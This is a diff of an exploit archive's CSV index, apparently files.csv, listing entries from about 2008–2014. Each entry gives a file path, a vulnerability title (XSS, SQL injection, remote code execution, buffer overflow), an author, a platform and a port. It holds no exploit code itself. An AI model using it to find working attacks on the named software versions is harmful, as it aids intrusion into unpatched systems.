-31697,platforms/php/webapps/31697.txt,"Horde Webmail 1.0.6 - 'addevent.php' Cross-Site Scripting Vulnerability",2008-04-23,"Aria-Security Team",php,webapps,0 -31698,platforms/hardware/remote/31698.txt,"F5 Networks FirePass 4100 SSL VPN 'installControl.php3' - Cross-Site Scripting Vulnerability",2008-04-23,"Alberto Cuesta Partida",hardware,remote,0 -31699,platforms/windows/remote/31699.txt,"RSA Authentication Agent for Web 5.3 - URI Redirection Vulnerability",2008-04-23,"Richard Brain",windows,remote,0 -31700,platforms/php/webapps/31700.txt,"e107 CMS 0.7 - Multiple Cross-Site Scripting Vulnerabilities",2008-04-24,ZoRLu,php,webapps,0 -31701,platforms/php/webapps/31701.txt,"Digital Hive 2.0 - 'base.php' Parameter Cross-Site Scripting Vulnerability",2008-04-24,ZoRLu,php,webapps,0 31702,platforms/php/webapps/31702.txt,"PHP-Nuke DownloadsPlus Module - Arbitrary File Upload Vulnerability",2008-04-24,ZoRLu,php,webapps,0 31703,platforms/php/webapps/31703.txt,"Pixel Motion Blog - 'list_article.php' Cross-Site Scripting Vulnerability",2008-04-24,ZoRLu,php,webapps,0 31704,platforms/php/webapps/31704.txt,"PHCDownload 1.1 - admin/index.php hash Parameter SQL Injection",2008-04-24,ZoRLu,php,webapps,0 @@ -28485,8 +28570,6 @@ id,file,description,date,author,platform,type,port 31711,platforms/windows/dos/31711.html,"Microsoft Excel 2007 - JavaScript Code Remote Denial Of Service Vulnerability",2008-04-26,"Juan Pablo Lopez Yacubian",windows,dos,0 31712,platforms/php/webapps/31712.txt,"miniBB 2.2 - 'bb_admin.php' Cross-Site Scripting Vulnerability",2008-04-28,IRCRASH,php,webapps,0 31713,platforms/linux/dos/31713.py,"PeerCast 0.1218 - 'getAuthUserPass' Multiple Buffer Overflow Vulnerabilities",2008-04-29,"Nico Golde",linux,dos,0 -31714,platforms/php/webapps/31714.txt,"C-News 1.0.1 - 'install.php' Cross-Site Scripting Vulnerability",2008-04-30,ZoRLu,php,webapps,0 -31715,platforms/multiple/remote/31715.pl,"Castle Rock Computing SNMPc <= 7.0.19 - Community String Stack Based Buffer Overflow Vulnerability",2008-11-11,"raveen Darshanam",multiple,remote,0 31716,platforms/php/webapps/31716.txt,"VWar 1.6.1 R2 - Multiple Remote Vulnerabilities",2008-05-01,"Darren McDonald",php,webapps,0 31717,platforms/php/webapps/31717.txt,"MJGUEST 6.7 - QT 'mjguest.php' Cross-Site Scripting Vulnerability",2008-05-01,IRCRASH,php,webapps,0 31718,platforms/php/webapps/31718.txt,"CoronaMatrix phpAddressBook 2.0 - 'username' Cross-Site Scripting Vulnerability",2008-05-01,IRCRASH,php,webapps,0 @@ -28505,8 +28588,9 @@ id,file,description,date,author,platform,type,port 31731,platforms/php/webapps/31731.txt,"GEDCOM_TO_MYSQL php/index.php nom_branche - Parameter XSS",2008-05-05,ZoRLu,php,webapps,0 31732,platforms/php/webapps/31732.txt,"GEDCOM_TO_MYSQL php/info.php - Multiple Parameter XSS",2008-05-05,ZoRLu,php,webapps,0 31733,platforms/ios/webapps/31733.txt,"My PDF Creator & DE DM 1.4 iOS - Multiple Vulnerabilities",2014-02-18,Vulnerability-Lab,ios,webapps,50496 +32240,platforms/php/webapps/32240.txt,"Freeway 1.4.1 - Multiple Input Validation Vulnerabilities",2008-08-13,"Digital Security Research Group",php,webapps,0 31734,platforms/php/webapps/31734.txt,"Pina CMS - Multiple Vulnerabilities",2014-02-18,"Shadman Tanjim",php,webapps,80 -31735,platforms/php/webapps/31735.txt,"Concrete5 5.6.2.1 (index.php, cID param) - SQL Injection",2014-02-18,killall-9,php,webapps,80 +31735,platforms/php/webapps/31735.txt,"Concrete5 5.6.2.1 (index.php cID param) - SQL Injection",2014-02-18,killall-9,php,webapps,80 31736,platforms/windows/remote/31736.py,"Ultra Mini HTTPD 1.21 - POST Request Stack Buffer Overflow",2014-02-18,Sumit,windows,remote,80 31737,platforms/windows/remote/31737.rb,"Oracle Forms and Reports - Remote Code Execution",2014-02-18,metasploit,windows,remote,0 31738,platforms/php/webapps/31738.txt,"Open Web Analytics 1.5.4 - (owa_email_address param) SQL Injection Vulnerability",2014-02-18,"Dana James Traversie",php,webapps,0 @@ -28603,8 +28687,9 @@ id,file,description,date,author,platform,type,port 31829,platforms/php/webapps/31829.txt,"AbleDating 2.4 - search_results.php keyword Parameter SQL Injection",2008-05-22,"Ali Jasbi",php,webapps,0 31830,platforms/php/webapps/31830.txt,"AbleDating 2.4 - search_results.php keyword Parameter XSS",2008-05-22,"Ali Jasbi",php,webapps,0 31831,platforms/windows/remote/31831.py,"SolidWorks Workgroup PDM 2014 SP2 - Arbitrary File Write Vulnerability",2014-02-22,"Mohamed Shetta",windows,remote,30000 +32045,platforms/php/webapps/32045.txt,"eSyndiCat 2.2 - 'register.php' Multiple Cross-Site Scripting Vulnerabilities",2008-07-10,Fugitif,php,webapps,0 31833,platforms/php/webapps/31833.txt,"ILIAS 4.4.1 - Multiple Vulnerabilities",2014-02-22,HauntIT,php,webapps,80 -31834,platforms/php/webapps/31834.txt,"Wordpress AdRotate Plugin 3.9.4 - (clicktracker.php, track param) SQL Injection",2014-02-22,"High-Tech Bridge SA",php,webapps,80 +31834,platforms/php/webapps/31834.txt,"Wordpress AdRotate Plugin 3.9.4 - (clicktracker.php track param) SQL Injection",2014-02-22,"High-Tech Bridge SA",php,webapps,80 31835,platforms/php/webapps/31835.txt,"SAFARI Montage 3.1.3 - 'forgotPW.php' Multiple Cross-Site Scripting Vulnerabilities",2008-05-22,"Omer Singer",php,webapps,0 31836,platforms/php/webapps/31836.txt,"WordPress Upload File Plugin 'wp-uploadfile.php' - SQL Injection Vulnerability",2008-05-24,eserg.ru,php,webapps,0 31837,platforms/php/webapps/31837.txt,"DZOIC Handshakes 3.5 - 'fname' Parameter SQL Injection Vulnerability",2008-05-24,"Ali Jasbi",php,webapps,0 @@ -28623,7 +28708,7 @@ id,file,description,date,author,platform,type,port 31850,platforms/asp/webapps/31850.txt,"Campus Bulletin Board 3.4 - post3/Book.asp review Parameter XSS",2008-05-26,Unohope,asp,webapps,0 31851,platforms/asp/webapps/31851.txt,"Campus Bulletin Board 3.4 - post3/view.asp id Parameter SQL Injection",2008-05-26,Unohope,asp,webapps,0 31852,platforms/asp/webapps/31852.txt,"Campus Bulletin Board 3.4 - post3/book.asp review Parameter SQL Injection",2008-05-26,Unohope,asp,webapps,0 -31853,platforms/windows/remote/31853.py,"Symantec Endpoint Protection Manager 11.0, 12.0, 12.1 - Remote Command Execution Exploit",2014-02-23,"Chris Graham",windows,remote,0 +31853,platforms/windows/remote/31853.py,"Symantec Endpoint Protection Manager 11.0_ 12.0_ 12.1 - Remote Command Execution Exploit",2014-02-23,"Chris Graham",windows,remote,0 31854,platforms/asp/webapps/31854.html,"The Campus Request Repairs System 1.2 - 'sentout.asp' Unauthorized Access Vulnerability",2008-05-26,Unohope,asp,webapps,0 31855,platforms/php/webapps/31855.txt,"Tr Script News 2.1 - 'news.php' Cross-Site Scripting Vulnerability",2008-05-27,ZoRLu,php,webapps,0 31856,platforms/windows/dos/31856.html,"CA Internet Security Suite - 'UmxEventCli.dll' ActiveX Control Arbitrary File Overwrite Vulnerability",2008-05-28,Nine:Situations:Group,windows,dos,0 @@ -28682,11 +28767,9 @@ id,file,description,date,author,platform,type,port 31910,platforms/php/webapps/31910.txt,"vBulletin 3.6.10/3.7.1 - 'redirect' Parameter Cross-Site Scripting Vulnerability",2008-06-13,anonymous,php,webapps,0 31911,platforms/linux/local/31911.txt,"Vim 7.x - Vim Script Multiple Command Execution Vulnerabilities",2008-06-14,"Jan Minar",linux,local,0 31912,platforms/multiple/remote/31912.txt,"GSC Client 1.00 2067 - Privilege Escalation Vulnerability",2008-06-14,"Michael Gray",multiple,remote,0 -31913,platforms/windows/dos/31913.pl,"Music AlarmClock 2.1.0 - (.m3u) Crash PoC",2014-02-26,"Gabor Seljan",windows,dos,0 31914,platforms/windows/dos/31914.pl,"Gold MP4 Player 3.3 - Buffer Overflow PoC (SEH)",2014-02-26,"Gabor Seljan",windows,dos,0 31915,platforms/linux/dos/31915.py,"GoAhead Web Server 3.1.x - Denial of Service",2014-02-26,"Alaeddine MESBAHI",linux,dos,80 31916,platforms/php/webapps/31916.txt,"Piwigo 2.6.1 - CSRF Vulnerability",2014-02-26,killall-9,php,webapps,80 -31917,platforms/windows/remote/31917.rb,"Symantec Endpoint Protection Manager - Remote Command Execution",2014-02-26,metasploit,windows,remote,9090 31918,platforms/multiple/remote/31918.txt,"Crysis 1.21 - 'keyexchange' Packet Information Disclosure Vulnerability",2008-06-15,"Luigi Auriemma",multiple,remote,0 31919,platforms/multiple/dos/31919.c,"S.T.A.L.K.E.R. 1.0.06 - Remote Denial of Service Vulnerability",2008-06-15,"Luigi Auriemma",multiple,dos,0 31920,platforms/multiple/remote/31920.txt,"Glub Tech Secure FTP 2.5.15 - 'LIST' Command Directory Traversal Vulnerability",2008-06-13,"Tan Chew Keong",multiple,remote,0 @@ -28713,6 +28796,7 @@ id,file,description,date,author,platform,type,port 31941,platforms/multiple/remote/31941.txt,"WISE-FTP 4.1/5.5.8 FTP Client 'LIST' Command Directory Traversal Vulnerability",2008-06-20,"Tan Chew Keong",multiple,remote,0 31942,platforms/multiple/remote/31942.txt,"Classic FTP 1.02 - 'LIST' Command Directory Traversal Vulnerability",2008-06-20,"Tan Chew Keong",multiple,remote,0 31943,platforms/php/webapps/31943.html,"GL-SH Deaf Forum 6.5.5 - Cross-Site Scripting Vulnerability and Arbitrary File Upload Vulnerability",2008-06-20,"AmnPardaz ",php,webapps,0 +32214,platforms/php/webapps/32214.pl,"FreePBX 2.11.0 - Remote Command Execution",2014-03-12,@0x00string,php,webapps,80 31944,platforms/php/webapps/31944.txt,"PHPAuction 'profile.php' SQL Injection Vulnerability",2008-06-21,Mr.SQL,php,webapps,0 31945,platforms/php/webapps/31945.txt,"PEGames Multiple Cross-Site Scripting Vulnerabilities",2008-06-23,CraCkEr,php,webapps,0 31946,platforms/php/webapps/31946.txt,"IDMOS 1.0 - 'site_absolute_path' Parameter Multiple Remote File Include Vulnerabilities",2008-06-23,CraCkEr,php,webapps,0 @@ -28738,9 +28822,16 @@ id,file,description,date,author,platform,type,port 31966,platforms/linux/dos/31966.c,"Linux Kernel - utrace and ptrace Local Denial of Service Vulnerability (2)",2008-06-25,"Alexei Dobryanov",linux,dos,0 31967,platforms/asp/webapps/31967.txt,"Commtouch Anti-Spam Enterprise Gateway 'PARAMS' Parameter Cross-Site Scripting Vulnerability",2008-06-26,"Erez Metula",asp,webapps,0 31968,platforms/linux/dos/31968.txt,"GNOME Rhythmbox 0.11.5 Malformed Playlist File Denial Of Service Vulnerability",2008-06-26,"Juan Pablo Lopez Yacubian",linux,dos,0 +32135,platforms/php/webapps/32135.txt,"common solutions csphonebook 1.02 - 'index.php' Cross-Site Scripting Vulnerability",2008-07-31,"Ghost Hacker",php,webapps,0 +32046,platforms/jsp/webapps/32046.txt,"IBM Maximo 4.1/ 5.2 - 'debug.jsp' HTML Injection And Information Disclosure Vulnerabilities",2008-07-11,"Deniz Cevik",jsp,webapps,0 +32047,platforms/php/webapps/32047.txt,"Hudson 1.223 - 'q' Parameter Cross-Site Scripting Vulnerability",2008-07-11,syniack,php,webapps,0 +32048,platforms/osx/remote/32048.html,"Apple iPhone and iPod Touch < 2.0 - Multiple Remote Vulnerabilities",2008-07-11,"Hiromitsu Takagi",osx,remote,0 31970,platforms/php/webapps/31970.txt,"PHP-CMDB 0.7.3 - Multiple Vulnerabilities",2014-02-28,HauntIT,php,webapps,80 -31971,platforms/php/webapps/31971.txt,"PHP Ticket System Beta 1 (get_all_created_by_user.php, id param) - SQL Injection",2014-02-28,HauntIT,php,webapps,80 +31971,platforms/php/webapps/31971.txt,"PHP Ticket System Beta 1 (get_all_created_by_user.php id param) - SQL Injection",2014-02-28,HauntIT,php,webapps,80 31972,platforms/windows/local/31972.py,"Gold MP4 Player 3.3 - Buffer Overflow Exploit (SEH)",2014-02-28,metacom,windows,local,0 +32094,platforms/cgi/webapps/32094.pl,"HiFriend 'cgi-bin/hifriend.pl' Open Email Relay Vulnerability",2008-07-21,Perforin,cgi,webapps,0 +32095,platforms/linux/dos/32095.pl,"Asterisk <= 1.6 IAX 'POKE' Requests Remote Denial of Service Vulnerability",2008-07-21,"Blake Cornell",linux,dos,0 +32133,platforms/linux/remote/32133.txt,"libxslt 1.1.x - RC4 Encryption and Decryption Functions Buffer Overflow Vulnerability",2008-07-31,"Chris Evans",linux,remote,0 31975,platforms/php/webapps/31975.txt,"The Rat CMS viewarticle.php Multiple Parameter XSS",2008-06-26,"CWH Underground",php,webapps,0 31976,platforms/php/webapps/31976.txt,"The Rat CMS viewarticle2.php id Parameter XSS",2008-06-26,"CWH Underground",php,webapps,0 31977,platforms/php/webapps/31977.txt,"The Rat CMS viewarticle.php id Parameter SQL Injection",2008-06-26,"CWH Underground",php,webapps,0 @@ -28749,13 +28840,12 @@ id,file,description,date,author,platform,type,port 31980,platforms/windows/remote/31980.html,"UUSee 2008 UUUpgrade ActiveX Control 'Update' Method Arbitrary File Download Vulnerability",2008-06-26,Symantec,windows,remote,0 31981,platforms/php/webapps/31981.txt,"PolyPager 0.9.51/1.0 - 'nr' Parameter Cross-Site Scripting Vulnerability",2008-06-26,"CWH Underground",php,webapps,0 31982,platforms/php/webapps/31982.txt,"Webuzo 2.1.3 - Multiple Vulnerabilities",2014-02-28,Mahendra,php,webapps,80 +32134,platforms/php/webapps/32134.txt,"H0tturk Panel 'gizli.php' Remote File Include Vulnerability",2008-07-31,U238,php,webapps,0 31983,platforms/multiple/webapps/31983.txt,"Plex Media Server 0.9.9.2.374-aa23a69 - Multiple Vulnerabilities",2014-02-28,"SEC Consult",multiple,webapps,32400 -31984,platforms/linux/dos/31984.txt,"Mozilla Firefox 3.0 - Malformed JPEG File Denial of Service Vulnerability",2008-06-27,"Beenu Arora",linux,dos,0 -31985,platforms/hardware/webapps/31985.txt,"MICROSENS Profi Line Switch 10.3.1 - Privilege Escalation",2014-02-28,"SEC Consult",hardware,webapps,0 31986,platforms/php/webapps/31986.txt,"Wordpress VideoWhisper 4.27.3 - Multiple Vulnerabilities",2014-02-28,"High-Tech Bridge SA",php,webapps,80 31987,platforms/windows/remote/31987.rb,"GE Proficy CIMPLICITY gefebt.exe Remote Code Execution",2014-02-28,metasploit,windows,remote,80 31988,platforms/windows/local/31988.rb,"Total Video Player 1.3.1 (Settings.ini) - SEH Buffer Overflow",2014-02-28,metasploit,windows,local,0 -31989,platforms/php/webapps/31989.txt,"webERP 4.11.3 (SalesInquiry.php, SortBy param) - SQL Injection Vulnerability",2014-02-28,HauntIT,php,webapps,80 +31989,platforms/php/webapps/31989.txt,"webERP 4.11.3 (SalesInquiry.php SortBy param) - SQL Injection Vulnerability",2014-02-28,HauntIT,php,webapps,80 31990,platforms/multiple/webapps/31990.txt,"SpagoBI 4.0 - Privilege Escalation Vulnerability",2014-02-28,"Christian Catalano",multiple,webapps,0 31991,platforms/windows/local/31991.rb,"VCDGear 3.50 - (.cue) Stack Buffer Overflow Exploit",2014-02-28,Provensec,windows,local,0 31992,platforms/windows/webapps/31992.txt,"Oracle Demantra 12.2.1 - Arbitrary File Disclosure",2014-03-01,Portcullis,windows,webapps,0 @@ -28773,6 +28863,7 @@ id,file,description,date,author,platform,type,port 32004,platforms/php/webapps/32004.txt,"FaName 1.0 index.php Multiple Parameter XSS",2008-06-30,"Jesper Jurcenoks",php,webapps,0 32005,platforms/php/webapps/32005.txt,"FaName 1.0 page.php name Parameter XSS",2008-06-30,"Jesper Jurcenoks",php,webapps,0 32006,platforms/multiple/dos/32006.txt,"Wireshark 1.0.0 - Multiple DoS",2008-06-30,"Noam Rathus",multiple,dos,0 +32131,platforms/php/webapps/32131.txt,"ClipSharePro <= 4.1 - Local File Inclusion",2014-03-09,"Saadi Siddiqui",php,webapps,0 32009,platforms/unix/dos/32009.txt,"QNX Neutrino RTOS 6.3 - 'phgrafx' Local Buffer Overflow Vulnerability",2008-07-01,"Filipe Balestra",unix,dos,0 32010,platforms/php/webapps/32010.txt,"Joomla! and Mambo 'com_is' 1.0.1 Component Multiple SQL Injection Vulnerabilities",2008-07-02,"H-T Team",php,webapps,0 32011,platforms/php/webapps/32011.txt,"DodosMail 2.5 - 'dodosmail.php' Local File Include Vulnerability",2008-07-07,ahmadbady,php,webapps,0 @@ -28806,10 +28897,9 @@ id,file,description,date,author,platform,type,port 32039,platforms/php/webapps/32039.txt,"SpagoBI 4.0 - Persistent HTML Script Insertion",2014-03-03,"Christian Catalano",php,webapps,0 32040,platforms/php/webapps/32040.txt,"SpagoBI 4.0 - Arbitrary XSS File Upload",2014-03-03,"Christian Catalano",php,webapps,0 32041,platforms/windows/local/32041.pl,"ALLPlayer 5.8.1 - (.m3u) Buffer Overflow (SEH)",2014-03-03,"Gabor Seljan",windows,local,0 -32045,platforms/php/webapps/32045.txt,"eSyndiCat 2.2 - 'register.php' Multiple Cross-Site Scripting Vulnerabilities",2008-07-10,Fugitif,php,webapps,0 -32046,platforms/jsp/webapps/32046.txt,"IBM Maximo 4.1/ 5.2 - 'debug.jsp' HTML Injection And Information Disclosure Vulnerabilities",2008-07-11,"Deniz Cevik",jsp,webapps,0 -32047,platforms/php/webapps/32047.txt,"Hudson 1.223 - 'q' Parameter Cross-Site Scripting Vulnerability",2008-07-11,syniack,php,webapps,0 -32048,platforms/osx/remote/32048.html,"Apple iPhone and iPod Touch < 2.0 - Multiple Remote Vulnerabilities",2008-07-11,"Hiromitsu Takagi",osx,remote,0 +32132,platforms/windows/remote/32132.py,"GetGo Download Manager 4.9.0.1982 - HTTP Response Header Buffer Overflow Remote Code Execution",2014-03-09,"Julien Ahrens",windows,remote,0 +32283,platforms/php/webapps/32283.txt,"Scripts4Profit DXShopCart 4.30 - 'pid' Parameter SQL Injection Vulnerability",2008-08-21,"Hussin X",php,webapps,0 +32284,platforms/php/webapps/32284.txt,"Simasy CMS - 'id' Parameter SQL Injection Vulnerability",2008-08-21,r45c4l,php,webapps,0 32049,platforms/windows/remote/32049.txt,"Microsoft Internet Explorer 6.0 New ActiveX Object String Concatenation Memory Corruption Vulnerability",2008-07-14,0x000000,windows,remote,0 32050,platforms/windows/local/32050.py,"Calavera UpLoader 3.5 - SEH Buffer Overflow",2014-03-04,"Daniel la calavera",windows,local,0 32051,platforms/php/webapps/32051.php,"Pubs Black Cat [The Fun] 'browse.groups.php' SQL Injection Vulnerability",2008-07-14,RMx,php,webapps,0 @@ -28853,8 +28943,6 @@ id,file,description,date,author,platform,type,port 32091,platforms/php/webapps/32091.txt,"MyBlog 0.9.8 - Multiple Remote Information Disclosure Vulnerabilities",2008-07-21,"AmnPardaz Security Research Team",php,webapps,0 32092,platforms/php/webapps/32092.txt,"Flip 3.0 - 'config.php' Remote File Include Vulnerability",2008-07-21,Cru3l.b0y,php,webapps,0 32093,platforms/php/webapps/32093.txt,"phpKF 'forum_duzen.php' SQL Injection Vulnerability",2008-07-21,U238,php,webapps,0 -32094,platforms/cgi/webapps/32094.pl,"HiFriend 'cgi-bin/hifriend.pl' Open Email Relay Vulnerability",2008-07-21,Perforin,cgi,webapps,0 -32095,platforms/linux/dos/32095.pl,"Asterisk <= 1.6 IAX 'POKE' Requests Remote Denial of Service Vulnerability",2008-07-21,"Blake Cornell",linux,dos,0 32096,platforms/php/webapps/32096.pl,"EasyE-Cards 3.10 SQL Injection Vulnerability and Multiple Cross-Site Scripting Vulnerabilities",2008-07-21,Dr.Crash,php,webapps,0 32097,platforms/php/webapps/32097.txt,"Xoops 2.0.18 modules/system/admin.php fct Parameter Traversal Local File Inclusion",2008-07-21,Ciph3r,php,webapps,0 32098,platforms/php/webapps/32098.txt,"Xoops 2.0.18 modules/system/admin.php fct Parameter XSS",2008-07-21,Ciph3r,php,webapps,0 @@ -28890,11 +28978,6 @@ id,file,description,date,author,platform,type,port 32128,platforms/php/webapps/32128.txt,"MJGUEST 6.8 - 'guestbook.js.php' Cross-Site Scripting Vulnerability",2008-07-30,DSecRG,php,webapps,0 32129,platforms/windows/remote/32129.cpp,"BlazeVideo HDTV Player 3.5 PLF File Stack Buffer Overflow Vulnerability",2008-07-30,"fl0 fl0w",windows,remote,0 32130,platforms/php/webapps/32130.txt,"DEV Web Management System 1.5 - Multiple Input Validation Vulnerabilities",2008-07-30,Dr.Crash,php,webapps,0 -32131,platforms/php/webapps/32131.txt,"ClipSharePro <= 4.1 - Local File Inclusion",2014-03-09,"Saadi Siddiqui",php,webapps,0 -32132,platforms/windows/remote/32132.py,"GetGo Download Manager 4.9.0.1982 - HTTP Response Header Buffer Overflow Remote Code Execution",2014-03-09,"Julien Ahrens",windows,remote,0 -32133,platforms/linux/remote/32133.txt,"libxslt 1.1.x - RC4 Encryption and Decryption Functions Buffer Overflow Vulnerability",2008-07-31,"Chris Evans",linux,remote,0 -32134,platforms/php/webapps/32134.txt,"H0tturk Panel 'gizli.php' Remote File Include Vulnerability",2008-07-31,U238,php,webapps,0 -32135,platforms/php/webapps/32135.txt,"common solutions csphonebook 1.02 - 'index.php' Cross-Site Scripting Vulnerability",2008-07-31,"Ghost Hacker",php,webapps,0 32136,platforms/osx/dos/32136.html,"Apple Mac OS X 10.x CoreGraphics Multiple Memory Corruption Vulnerabilities",2008-07-31,"Michal Zalewski",osx,dos,0 32137,platforms/multiple/remote/32137.txt,"Apache Tomcat <= 6.0.16 - 'RequestDispatcher' Information Disclosure Vulnerability",2008-08-01,"Stefano Di Paola",multiple,remote,0 32138,platforms/multiple/remote/32138.txt,"Apache Tomcat <= 6.0.16 - 'HttpServletResponse.sendError()' Cross-Site Scripting Vulnerability",2008-08-01,"Konstantin Kolinko",multiple,remote,0 @@ -28919,7 +29002,7 @@ id,file,description,date,author,platform,type,port 32157,platforms/asp/webapps/32157.txt,"Kentico CMS 7.0.75 - User Information Disclosure",2014-03-10,"Charlie Campbell and Lyndon Mendoza",asp,webapps,80 32158,platforms/windows/local/32158.txt,"iCAM Workstation Control 4.8.0.0 - Authentication Bypass",2014-03-10,StealthHydra,windows,local,0 32161,platforms/hardware/webapps/32161.txt,"Huawei E5331 MiFi Mobile Hotspot 21.344.11.00.414 - Multiple Vulnerabilities",2014-03-10,"SEC Consult",hardware,webapps,80 -32162,platforms/multiple/webapps/32162.txt,"ownCloud 4.0.x, 4.5.x (upload.php, filename param) - Remote Code Execution",2014-03-10,Portcullis,multiple,webapps,80 +32162,platforms/multiple/webapps/32162.txt,"ownCloud 4.0.x_ 4.5.x (upload.php filename param) - Remote Code Execution",2014-03-10,Portcullis,multiple,webapps,80 32163,platforms/windows/remote/32163.rb,"SolidWorks Workgroup PDM 2014 pdmwService.exe Arbitrary File Write",2014-03-10,metasploit,windows,remote,30000 32164,platforms/windows/remote/32164.rb,"HP Data Protector Backup Client Service Remote Code Execution",2014-03-10,metasploit,windows,remote,5555 32165,platforms/linux/remote/32165.txt,"XAMPP Linux 1.6 - ming.php text Parameter XSS",2008-08-04,"Khashayar Fereidani",linux,remote,0 @@ -28963,16 +29046,14 @@ id,file,description,date,author,platform,type,port 32203,platforms/php/webapps/32203.txt,"Yogurt Social Network 3.2 rc1 Module for XOOPS tribes.php uid Parameter XSS",2008-08-09,Lostmon,php,webapps,0 32204,platforms/hardware/webapps/32204.txt,"ZyXEL Router P-660HN-T1A - Login Bypass",2014-03-12,"Michael Grifalconi",hardware,webapps,0 32205,platforms/windows/local/32205.txt,"Huawei Technologies eSpace Meeting Service 1.0.0.23 - Local Privilege Escalation",2014-03-12,LiquidWorm,windows,local,0 +32282,platforms/php/webapps/32282.txt,"Church Edit - Blind SQL Injection",2014-03-15,ThatIcyChill,php,webapps,0 32207,platforms/php/webapps/32207.txt,"GNUPanel 0.3.5_R4 - Multiple Vulnerabilities",2014-03-12,"Necmettin COSKUN",php,webapps,80 32208,platforms/multiple/dos/32208.txt,"Oracle VirtualBox 3D Acceleration - Multiple Vulnerabilities",2014-03-12,"Core Security",multiple,dos,0 32209,platforms/windows/remote/32209.rb,"Yokogawa CENTUM CS 3000 BKHOdeq.exe Buffer Overflow",2014-03-12,metasploit,windows,remote,20171 32210,platforms/windows/remote/32210.rb,"Yokogawa CENTUM CS 3000 BKBCopyD.exe Buffer Overflow",2014-03-12,metasploit,windows,remote,20111 32211,platforms/php/webapps/32211.txt,"LuxCal 3.2.2 - Multiple Vulnerabilities (CSRF/Blind SQL Injection)",2014-03-12,"TUNISIAN CYBER",php,webapps,80 -32212,platforms/asp/webapps/32212.txt,"Procentia IntelliPen 1.1.12.1520 (Data.aspx, value param) - Blind SQL Injection",2014-03-12,Portcullis,asp,webapps,80 -32213,platforms/php/webapps/32213.txt,"Vtiger CRM 5.4.0, 6.0 RC, 6.0.0 GA (browse.php, file param) - Local File Inclusion",2014-03-12,Portcullis,php,webapps,80 -32214,platforms/php/webapps/32214.pl,"FreePBX 2.11.0 - Remote Command Execution",2014-03-12,@0x00string,php,webapps,80 -32215,platforms/php/webapps/32215.txt,"RMSOFT Downloads Plus (rmdp) 1.5/1.7 Module for XOOPS search.php key Parameter XSS",2008-08-09,Lostmon,php,webapps,0 -32216,platforms/php/webapps/32216.txt,"RMSOFT Downloads Plus (rmdp) 1.5/1.7 Module for XOOPS down.php id Parameter XSS",2008-08-09,Lostmon,php,webapps,0 +32212,platforms/asp/webapps/32212.txt,"Procentia IntelliPen 1.1.12.1520 (Data.aspx_ value param) - Blind SQL Injection",2014-03-12,Portcullis,asp,webapps,80 +32213,platforms/php/webapps/32213.txt,"Vtiger CRM 5.4.0_ 6.0 RC_ 6.0.0 GA (browse.php file param) - Local File Inclusion",2014-03-12,Portcullis,php,webapps,80 32217,platforms/php/webapps/32217.txt,"Linkspider 1.08 - Multiple Remote File Include Vulnerabilities",2008-08-08,"Rohit Bansal",php,webapps,0 32218,platforms/php/webapps/32218.txt,"Domain Group Network GooCMS 1.02 - 'index.php' Cross-Site Scripting Vulnerability",2008-08-11,ahmadbaby,php,webapps,0 32219,platforms/php/webapps/32219.txt,"Kayako SupportSuite 3.x visitor/index.php sessionid Parameter XSS",2008-08-11,"James Bercegay",php,webapps,0 @@ -28995,15 +29076,8 @@ id,file,description,date,author,platform,type,port 32236,platforms/php/webapps/32236.txt,"Meet#Web 0.8 RegRightsResource.class.php root_path Parameter Remote File Inclusion",2008-08-13,"Rakesh S",php,webapps,0 32237,platforms/hardware/webapps/32237.txt,"Ubee EVW3200 - Multiple Persistent Cross-Site Scripting",2014-03-13,"Jeroen - IT Nerdbox",hardware,webapps,0 32238,platforms/hardware/webapps/32238.txt,"Ubee EVW3200 - Cross-Site Request Forgery",2014-03-13,"Jeroen - IT Nerdbox",hardware,webapps,0 +32286,platforms/linux/remote/32286.txt,"Fujitsu Web-Based Admin View 2.1.2 - Directory Traversal Vulnerability",2008-08-21,"Deniz Cevik",linux,remote,0 32239,platforms/php/webapps/32239.txt,"Trixbox All Versions - SQL Injection",2014-03-13,Sc4nX,php,webapps,0 -32240,platforms/php/webapps/32240.txt,"Freeway 1.4.1 - Multiple Input Validation Vulnerabilities",2008-08-13,"Digital Security Research Group",php,webapps,0 -32241,platforms/php/webapps/32241.txt,"PHP Realty 'dpage.php' SQL Injection Vulnerability",2008-08-13,CraCkEr,php,webapps,0 -32242,platforms/php/webapps/32242.txt,"PHP-Fusion 4.01 - 'readmore.php' SQL Injection Vulnerability",2008-08-13,Rake,php,webapps,0 -32243,platforms/php/webapps/32243.txt,"Nukeviet 2.0 - 'admin/login.php' Cookie Authentication Bypass Vulnerability",2008-08-13,Ciph3r,php,webapps,0 -32244,platforms/php/webapps/32244.txt,"YapBB 1.2 - 'class_yapbbcooker.php' Remote File Include Vulnerability",2008-08-13,CraCkEr,php,webapps,0 -32245,platforms/php/webapps/32245.txt,"Nortel Networks SRG V16 - modules.php module Parameter XSS",2008-08-13,CraCkEr,php,webapps,0 -32246,platforms/php/webapps/32246.txt,"Nortel Networks SRG V16 - admin_modules.php module Parameter Traversal Local File Inclusion",2008-08-13,CraCkEr,php,webapps,0 -32247,platforms/php/webapps/32247.txt,"Nortel Networks SRG V16 - modules.php module Parameter Traversal Local File Inclusion",2008-08-13,CraCkEr,php,webapps,0 32248,platforms/linux/dos/32248.txt,"Yelp 2.23.1 Invalid URI Format String Vulnerability",2008-08-13,"Aaron Grattafiori",linux,dos,0 32249,platforms/jsp/webapps/32249.txt,"Openfire <= 3.5.2 - 'login.jsp' Cross-Site Scripting Vulnerability",2008-08-14,"Daniel Henninger",jsp,webapps,0 32250,platforms/php/webapps/32250.py,"mUnky 0.01'index.php' Remote Code Execution Vulnerability",2008-08-15,IRCRASH,php,webapps,0 @@ -29016,8 +29090,10 @@ id,file,description,date,author,platform,type,port 32257,platforms/php/webapps/32257.txt,"PromoProducts 'view_product.php' Multiple SQL Injection Vulnerabilities",2008-08-15,baltazar,php,webapps,0 32258,platforms/cgi/webapps/32258.txt,"AWStats 6.8 - 'awstats.pl' Cross-Site Scripting Vulnerability",2008-08-18,"Morgan Todd",cgi,webapps,0 32259,platforms/php/webapps/32259.txt,"Freeway 1.4.1.171 english/account.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0 +33409,platforms/php/webapps/33409.txt,"Article Directory 'login.php' SQL Injection Vulnerabilities",2009-12-16,"R3d D3v!L",php,webapps,0 32261,platforms/windows/local/32261.rb,"MicroP 0.1.1.1600 - (.mppl) Local Stack Based Buffer Overflow",2014-03-14,"Necmettin COSKUN",windows,local,0 -32263,platforms/php/webapps/32263.txt,"Trixbox (endpoint_aastra.php, mac param) - Remote Code 